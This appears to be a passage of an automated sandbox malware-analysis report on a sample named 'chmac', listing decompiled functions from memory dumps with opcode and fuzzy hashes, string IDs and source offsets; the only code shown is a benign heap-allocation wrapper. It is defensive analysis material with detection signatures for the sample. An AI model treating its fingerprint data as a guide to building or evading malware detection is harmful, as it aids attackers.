Instruction Fuzzy Hash: 68F0AF359043848FDB21DF05D989761FFA0EF04721F48C0EADD494B666D2B9A448CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00403e3d
0x00403e43
0x00403e49
0x00403e7b
0x00403e80
0x00403e86
0x00000000
0x00403e86
0x00403e4d
0x00403e4f
0x00403e4f
0x00403e66
0x00403e6f
0x00403e77
0x00000000
0x00000000
0x00403e57
0x00403e59
0x00000000
0x00000000
0x00403e5c
0x00403e61
0x00403e62
0x00403e64
0x00000000
0x00000000
0x00403e64
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 0000000E.00000001.325106635.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED

Uniqueness

Uniqueness Score: -1.00%

Function 048802E8, Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

`5q, xrefs: 048803A5

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID: `5q
API String ID: 0-3867205651
Opcode ID: da8fedcacfc2a3cd4704e3e75e76b0e910cb510b16cb36eace15644e6a46c029
Instruction ID: 2b835cfecc2c1beb39dd65968d9f0f7952b77b084f3b586992dfcda9b128ce73
Opcode Fuzzy Hash: da8fedcacfc2a3cd4704e3e75e76b0e910cb510b16cb36eace15644e6a46c029
Instruction Fuzzy Hash: AD51AE34B042058FCB05EF68C5A46ADBBF2EF8A304F15856DE446EB365DB31AC09DB51

Uniqueness

Uniqueness Score: -1.00%

Function 04882D58, Relevance: 1.4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

, xrefs: 04882E76

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 3b14be50214c45efe710bff5da41e08175b0c5836b9e8a9e6ef5c39469f22df0
Instruction ID: ab21c357c2d1ade9dacdb4f284e8fda80178b34a2cb6c5561d655f412c3132a1
Opcode Fuzzy Hash: 3b14be50214c45efe710bff5da41e08175b0c5836b9e8a9e6ef5c39469f22df0
Instruction Fuzzy Hash: 5241B531F081599FCB10EF65C8805AEBBB2EBC1219B19CEEEC456DB646D235F8028795

Uniqueness

Uniqueness Score: -1.00%

Function 04880BC0, Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

hXMr, xrefs: 04880C78

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID: hXMr
API String ID: 0-1185242784
Opcode ID: f5df3f4ac8f4ab664b347f98db89bf7589e6adf9836e35b25b5291a6c9263035
Instruction ID: ee8b6009a55f0faa95038eae08a6505e8d06c23101cd760d37002194eb128ac4
Opcode Fuzzy Hash: f5df3f4ac8f4ab664b347f98db89bf7589e6adf9836e35b25b5291a6c9263035
Instruction Fuzzy Hash: 61412A31B051188FC7059F68C4146AE77E7AFC6314F16856EE806EF7A1DEB1AC0A8792

Uniqueness

Uniqueness Score: -1.00%

Function 04881458, Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

$gq, xrefs: 048814C7

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID: $gq
API String ID: 0-815412418
Opcode ID: 42730b91fc5b3d03e52e83c452dfb76bbd28898ac840213c64b52699f8dae002
Instruction ID: d605dc7e3d95a42a37a542bc722975f9926a72971cd1e08ef48d8aba58c5cc43
Opcode Fuzzy Hash: 42730b91fc5b3d03e52e83c452dfb76bbd28898ac840213c64b52699f8dae002
Instruction Fuzzy Hash: A3513934A01219CFDB14EF64C898B9CBBB2BF48304F5085E9D40AAB366DB34AD85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04881290, Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

$gq, xrefs: 04881349

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID: $gq
API String ID: 0-815412418
Opcode ID: 575b7bb95d9924083fa88f5a041a2a6d82d1534f8e9f2d1b31b7627d27fe5d77
Instruction ID: 33e62acabb44411164427cf548d1a095d2371b7e3ae3d2c42aab8ac3ddcf8afe
Opcode Fuzzy Hash: 575b7bb95d9924083fa88f5a041a2a6d82d1534f8e9f2d1b31b7627d27fe5d77
Instruction Fuzzy Hash: BD412634A04259CFCB54EF68C898B9DBBB1BF49304F0045A9D44AEB356DB34AD85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 048821F8, Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

r*+, xrefs: 0488230F

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: 982f11fb0c16ac5432d2b3b450d7bfd516b98d37f4515b0a11b76c65d1b9dde9
Instruction ID: edba4a2994ea8becb9e7605ac60096602c56a272b8812be5641accf40d81372e
Opcode Fuzzy Hash: 982f11fb0c16ac5432d2b3b450d7bfd516b98d37f4515b0a11b76c65d1b9dde9
Instruction Fuzzy Hash: BA410C30E08209DFCB54EBA5C5556AEBBF1FB44304F1089AED412E72A1E734AA45DF52

Uniqueness

Uniqueness Score: -1.00%

Function 048805B9, Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

8$q, xrefs: 048805D6

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID: 8$q
API String ID: 0-2903697390
Opcode ID: 69c3f0d25023be13c779b1d9437034e1e0e2d6f91745fa41a53baaeb9db0afaa
Instruction ID: e1f30a1c28bb5e353f506ead0effca848dc288d7f63e3412b50efed249ec4c88
Opcode Fuzzy Hash: 69c3f0d25023be13c779b1d9437034e1e0e2d6f91745fa41a53baaeb9db0afaa
Instruction Fuzzy Hash: 760126203082660FC71A333D70221BE6B9B9FC7641B1844AEF042DB3ABCE686C4743D6

Uniqueness

Uniqueness Score: -1.00%

Function 048805C8, Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

8$q, xrefs: 048805D6

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID: 8$q
API String ID: 0-2903697390
Opcode ID: fec3c692502967d395aace79f8755be646d7a2bc17a6bb2367c6cc78162f0a1c
Instruction ID: c5b32e8009fc4ee3cf3f868aa159c3ce9b89fdc5bc9128eb2684ec2669268340
Opcode Fuzzy Hash: fec3c692502967d395aace79f8755be646d7a2bc17a6bb2367c6cc78162f0a1c
Instruction Fuzzy Hash: 51F0F0713001250BC618733D711257F22CB5BC5A52F14403EF006EB3A9DE69AC0703EA

Uniqueness

Uniqueness Score: -1.00%

Function 048802A1, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c50a325d26581a264d3df78806d92d1d681f55711f72b3eddba0ea171498cb1
Instruction ID: 353abbdb6592039313fbe7b5d74002e844ba9d0ccd9062764d8c720ab68136e0
Opcode Fuzzy Hash: 0c50a325d26581a264d3df78806d92d1d681f55711f72b3eddba0ea171498cb1
Instruction Fuzzy Hash: 3341DF34B042058FCB15EF68C1646ADBBB2EF8A300F15496DD442EB795DB71BC08CB41

Uniqueness

Uniqueness Score: -1.00%

Function 048802DA, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f3648fe5766397eb35014989c82b703396e4dde8222596b15ead5205120f14
Instruction ID: 62fec4b622ad51a48b67087532a09f108e20ca42ab45084b30d68e4726ede27c
Opcode Fuzzy Hash: f9f3648fe5766397eb35014989c82b703396e4dde8222596b15ead5205120f14
Instruction Fuzzy Hash: 8F41C070B002058FDB14DF68C1A4BAEBBB2EF8A314F15496CE402EB7A1DB31AC45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 048820D0, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2343b9725d609ae42971840356417b62a4e6b45a1256a9c0c8b080d0005f207c
Instruction ID: b46bc5a44561bca7fb8a68b39866c65604ac276d90648b74dbde8c1d5bce511b
Opcode Fuzzy Hash: 2343b9725d609ae42971840356417b62a4e6b45a1256a9c0c8b080d0005f207c
Instruction Fuzzy Hash: CD316138B0524ADFCB05FFA8C8806797BB5FF85304B6589AAD505DB255E730BC41C751

Uniqueness

Uniqueness Score: -1.00%

Function 048808AF, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46d87c20987086989cdc64b899f8f8c74f883e44018db2c290de1140ede7dabe
Instruction ID: 17776b37b828b3ccbab83876494d657f50aca86cb4bd3b0d8fd30b9ee05dd5be
Opcode Fuzzy Hash: 46d87c20987086989cdc64b899f8f8c74f883e44018db2c290de1140ede7dabe
Instruction Fuzzy Hash: 0431203162E246CFC3217BF4FC4D699BB61AF423067054A6AF412E6175CB24588BBBA1

Uniqueness

Uniqueness Score: -1.00%

Function 048825DE, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d0e479f0445bc1bf00edce142fe06301a8c1f55f9a9f9c2e08c82de2223dca3
Instruction ID: 5a011311da32125bdccce05fd0517bca130697ed9f85bbc041d53899f594a875
Opcode Fuzzy Hash: 5d0e479f0445bc1bf00edce142fe06301a8c1f55f9a9f9c2e08c82de2223dca3
Instruction Fuzzy Hash: C231AF30A1424ACFDB20EF65C94475ABBF2BF84304F10C66DC015EB225DB78A98ACF80

Uniqueness

Uniqueness Score: -1.00%

Function 048821E9, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 285d3742f8d846bf2bcca1e6317110877db0ac03196f01d1bc950ea0d5a2d4dc
Instruction ID: 676c8a6ddf6bf5fd708fe60d7801b735b842062ba39dd1d5631b7cef42f65b97
Opcode Fuzzy Hash: 285d3742f8d846bf2bcca1e6317110877db0ac03196f01d1bc950ea0d5a2d4dc
Instruction Fuzzy Hash: 9E314B30E0820ADFCB54EBA8C1456BDBBF2BB45304F104ADED402D72A5E7356A45DB42

Uniqueness

Uniqueness Score: -1.00%

Function 04884190, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40f4a0e1c6b8cd6a7ae12a1ace001213d9e2c9ba09bfd4b39289947be39c5966
Instruction ID: 560e7d244e747c655fef70075c2d65543417417bd01543d34ce375bee4c8349c
Opcode Fuzzy Hash: 40f4a0e1c6b8cd6a7ae12a1ace001213d9e2c9ba09bfd4b39289947be39c5966
Instruction Fuzzy Hash: 55113632B0822B8BDB14FBB599555BF7AAAAF84744F504A3E9407D3251FE70680097A2

Uniqueness

Uniqueness Score: -1.00%

Function 023E8244, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341191445.00000000023E0000.00000040.00000040.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_23e0000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6751565186d7a4b74413ed2240b0b90206dfbd421fe65472f3624b9741376edd
Instruction ID: fce5bd6d74a719ee6bb9f55bb8c291ab6aec7527d607bfa3b236c20154c43c54
Opcode Fuzzy Hash: 6751565186d7a4b74413ed2240b0b90206dfbd421fe65472f3624b9741376edd
Instruction Fuzzy Hash: CB110634614680DFDB16CB54C944B26BBD6EB88708F24C99CE84A1BAA3C77BD807CA51

Uniqueness

Uniqueness Score: -1.00%

Function 048811DF, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecaaeedccd39e9d701c5e6244c76693bdfc4724ef9bd863fbdc21875c129b7e1
Instruction ID: 986f10fd2ba45496b78596675782e8210a44d4326c1ba37f663bb180fcd7c01a
Opcode Fuzzy Hash: ecaaeedccd39e9d701c5e6244c76693bdfc4724ef9bd863fbdc21875c129b7e1
Instruction Fuzzy Hash: 931173353092D08FC706A738842C9697FA69F87205B1945EFD486CF2B3DF656C0AD752

Uniqueness

Uniqueness Score: -1.00%

Function 023E820D, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341191445.00000000023E0000.00000040.00000040.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_23e0000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bfd964255aa8ff3c7ec570c100f1e337485ff9cac2651c4ab3635123cdbd7db
Instruction ID: 0d324b7aa8b723587687e58a90a10a29ea277d276bdfc588eb4c8d03853b669c
Opcode Fuzzy Hash: 0bfd964255aa8ff3c7ec570c100f1e337485ff9cac2651c4ab3635123cdbd7db
Instruction Fuzzy Hash: D3213E3550D7C08FD7138B64C950B55BFB1AF47204F1985DED4899F6A3C33A880ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 04880070, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0474661cedf6bab7b486859d73d60faeb7eac96b0ec3c0e3ab3518a27b79fad
Instruction ID: 0a3f3a6fab5ffaf298aeb0b8de4e1e8e2899399847ce8544b24156b7eee44fc7
Opcode Fuzzy Hash: c0474661cedf6bab7b486859d73d60faeb7eac96b0ec3c0e3ab3518a27b79fad
Instruction Fuzzy Hash: 74116D3460934BCBCB18FF74E55941C3BE2FB81309F81892CA086C7619EB35AC48AB46

Uniqueness

Uniqueness Score: -1.00%

Function 023E05DC, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341191445.00000000023E0000.00000040.00000040.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_23e0000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfbaf43323ab41068e6c51c63b3823b1f132aaf9791a9267706ba9fed0e4c961
Instruction ID: a46bec8a81d39b45031e2933900792626ab3a6b7be5f85d85e11c5d29a3d2083
Opcode Fuzzy Hash: bfbaf43323ab41068e6c51c63b3823b1f132aaf9791a9267706ba9fed0e4c961
Instruction Fuzzy Hash: E2F0C2765497806FC7118B0AEC41853FFA8EF8663070884ABEC498B212D129B908CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04881218, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bf1c0124b0c7d3f16bed8c1ad964d494bfb39ac69eb84b38a090ed8d120b89e
Instruction ID: 38eb7d333f31dbc098d94e6254e3e1701cecc86fb9c937bf5bb9e9c49197818f
Opcode Fuzzy Hash: 8bf1c0124b0c7d3f16bed8c1ad964d494bfb39ac69eb84b38a090ed8d120b89e
Instruction Fuzzy Hash: 50F06230304014CBC648E72CC05C96D77EABFC5715B1445AEE506CB775DF76AC0A9785

Uniqueness

Uniqueness Score: -1.00%

Function 048811B7, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1fd40caf629c45b4ca8881f0375f76511e55fb461d22976fcda7b7f169a84df
Instruction ID: c8779c74c91aa16e07bbbad1d3d692046b09ef6a01fc5cc4095a989e27f74705
Opcode Fuzzy Hash: b1fd40caf629c45b4ca8881f0375f76511e55fb461d22976fcda7b7f169a84df
Instruction Fuzzy Hash: 55F03035314018CBCA44FB2CD15C96DB7E6BF85309B104AAEE007CBA75DF75AC4A9B81

Uniqueness

Uniqueness Score: -1.00%

Function 04884180, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e569a01fad4b236fd9f2cac97cc87148bf180bdd69c964e744ad0678fbb42a8
Instruction ID: 47ec0e2ee1a52e9ef9ae949db7741374bdfa2a0a841a8f0580f9dae70d7335d1
Opcode Fuzzy Hash: 4e569a01fad4b236fd9f2cac97cc87148bf180bdd69c964e744ad0678fbb42a8
Instruction Fuzzy Hash: E3F0E23A60D29A9ECB22A7742C184AFBF688E970C47000AAFE486C2042F5B120069761

Uniqueness

Uniqueness Score: -1.00%

Function 04880908, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56ad1c40cb1416ce43182ada9ba7a337e4fe90401779eb665a5c0c70076f8950
Instruction ID: 05025a4799816738b492440e7ceeb3746d32861dcd8cfebabfab5f552896aab3
Opcode Fuzzy Hash: 56ad1c40cb1416ce43182ada9ba7a337e4fe90401779eb665a5c0c70076f8950
Instruction Fuzzy Hash: 12F05930A192888FC7126FB44C2856F7FA55F87204B070F9ECA03EB211E968385AE641

Uniqueness

Uniqueness Score: -1.00%

Function 04880918, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f4235f5372d0409691c9488c201ac4d222cb8e99dc98ee3a5bd6e55a808cfa1
Instruction ID: ab3fd1226641d953fdc3de5e2a275f7c90395c81b9e66700d14ffde80d78dffa
Opcode Fuzzy Hash: 0f4235f5372d0409691c9488c201ac4d222cb8e99dc98ee3a5bd6e55a808cfa1
Instruction Fuzzy Hash: 15E05532F2921CDBDB106AF59D050AFB7A89782254F020F2B8A07E3200E974680992D2

Uniqueness

Uniqueness Score: -1.00%

Function 023E8300, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341191445.00000000023E0000.00000040.00000040.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_23e0000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d74a29df55c69f98ab7c4b2aae8ba2665a8ebae01658a76b7ab1be4c5fff073
Instruction ID: b61803cef7aca31773e070d806f244481991bfe9996e1887d9029bd995eb9a41
Opcode Fuzzy Hash: 8d74a29df55c69f98ab7c4b2aae8ba2665a8ebae01658a76b7ab1be4c5fff073
Instruction Fuzzy Hash: B4F04B35504640DFC602CF40C540B15FBA2FB89718F24C6A9E9491BB62C3379812DA81

Uniqueness

Uniqueness Score: -1.00%

Function 048811CC, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3d31584e40f90901c5b1725cf715cc8e65a14707b22e8b64610b86c10fbac2
Instruction ID: a2b54f5774cda70cb33c910b404c77f73c65afc50b4e52901ca2e257b3156722
Opcode Fuzzy Hash: 5d3d31584e40f90901c5b1725cf715cc8e65a14707b22e8b64610b86c10fbac2
Instruction Fuzzy Hash: 86E06D34314008CBCA44FB2CD08C9A877E6FF862097104AAEE407CB676DF75AC499B41

Uniqueness

Uniqueness Score: -1.00%

Function 023E05F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341191445.00000000023E0000.00000040.00000040.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_23e0000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c50150dc4ba0e06e9f36943346e8c0eaa848f094b973b7f84e8c3b644f91042
Instruction ID: b311224a9818117e123c833e0ab402341b92f6374b78e945c93e3685f4c94264
Opcode Fuzzy Hash: 0c50150dc4ba0e06e9f36943346e8c0eaa848f094b973b7f84e8c3b644f91042
Instruction Fuzzy Hash: 27E092766407008BD654CF0AEC81452F7A4EB84630B18C07FDC0D8B701E57AF508CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04882D20, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 695a0ef9b03a05cde3740a11e8e7708a95ef1efdb30dd657167fa2862404c2c1
Instruction ID: 1f1cc65f95fcf6bf04fd93180c278e3c9b5e2f67c4f00d407903b4889839e1e3
Opcode Fuzzy Hash: 695a0ef9b03a05cde3740a11e8e7708a95ef1efdb30dd657167fa2862404c2c1
Instruction Fuzzy Hash: C9E0EC3428D2CD9ED763226458257A47F204B1B209F080BDAD0CACD4E7E04560169712

Uniqueness

Uniqueness Score: -1.00%

Function 0488064F, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52b3948ce1df41de4dd16e9741de119106d3880b1ecb5a58cb517a1579c94ebd
Instruction ID: cd411c5ee58ece468cc5274e03a47e235d96641f2edc66fc7e41dc92cc19c371
Opcode Fuzzy Hash: 52b3948ce1df41de4dd16e9741de119106d3880b1ecb5a58cb517a1579c94ebd
Instruction Fuzzy Hash: AFD05B715CD2844FC31977701C554E87F62CEA7114B158FAED44197823D1653597A601

Uniqueness

Uniqueness Score: -1.00%

Function 0488016F, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6022392deabf7c421016bc75ae620f692e8867e06e300fb4ee5321c927036a62
Instruction ID: 750270f8f4dfef96fa0201805e05d0b4c632efeb63465b0edb232005f5524ce0
Opcode Fuzzy Hash: 6022392deabf7c421016bc75ae620f692e8867e06e300fb4ee5321c927036a62
Instruction Fuzzy Hash: 44E0C23124A340CFCB192B30A81985C3B719FA52223044BBDD422C7EE1EA3A8483CA00

Uniqueness

Uniqueness Score: -1.00%

Function 006323F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.340761668.0000000000632000.00000040.00000001.sdmp, Offset: 00632000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_632000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5750d98425035ebe4f217431f757d32c7262ad4372e5ced0e0a1f04f1e68c8b
Instruction ID: 29f2be0571ae1882d006aa2603b479499b1d14407b6961315b3480b22e560d0c
Opcode Fuzzy Hash: c5750d98425035ebe4f217431f757d32c7262ad4372e5ced0e0a1f04f1e68c8b
Instruction Fuzzy Hash: E0D05E79204AC24FD3268A1CC2A8B953BD5AF51B04F4684F9A8008B7A3C768E9D1D240

Uniqueness

Uniqueness Score: -1.00%

Function 04882CF0, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a41eb986ead19f185faf772011a2687ababd14926b8250b6055fe201ed3b162
Instruction ID: ea7a9639b67407c389a5117835bd9917e6fc8564ffa2d7d17433160fa9aa3e1e
Opcode Fuzzy Hash: 7a41eb986ead19f185faf772011a2687ababd14926b8250b6055fe201ed3b162
